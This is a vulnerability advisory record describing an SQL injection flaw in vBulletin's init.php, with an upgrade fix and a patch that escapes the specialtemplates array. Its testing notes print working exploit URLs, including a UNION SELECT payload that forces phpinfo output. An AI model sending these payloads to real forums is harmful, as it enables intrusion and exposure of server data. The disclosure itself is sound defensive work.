vBulletin init.php SQL Injection

2005-01-02T07:09:55
ID OSVDB:12702
Type osvdb
Reporter al3ndaleeb(al3ndaleeb@uk2.net)
Modified 2005-01-02T07:09:55

Description

Vulnerability Description

vBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Open init.php file and search for:

$datastoretemp = $DB_site->query(" SELECT title, data FROM " . TABLE_PREFIX . "datastore WHERE title IN ('" . implode("', '", $specialtemplates) . "') "); unset($specials, $specialtemplates);

So, replace with these lines:

if(!is_array($specialtemplates)) exit;

$specialtemplate = array(); foreach ($specialtemplates AS $arrykey => $arryval) { $specialtemplate[] = addslashes($specialtemplates["$arrykey"]); }

$datastoretemp = $DB_site->query(" SELECT title, data FROM " . TABLE_PREFIX . "datastore WHERE title IN ('" . implode("', '", $specialtemplate) . "') ");

unset($specials, $specialtemplates, $specialtemplate);

Short Description

vBulletin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the specialtemplates variable in the init.php file is not verified properly and will allow an attacker to inject or manipulate SQL queries.

Manual Testing Notes

An exploit example:

http://[victim]/forum/global.php?specialtemplates=al3ndaleeb') http://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb') UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*

References:

Vendor URL: http://www.vbulletin.com/ Vendor Specific Solution URL: http://www.vbulletin.com/forum/showthread.php?postid=791268 Other Advisory URL: http://beyonce.beyondsecurity.com/unixfocus/5HP050KEKM.html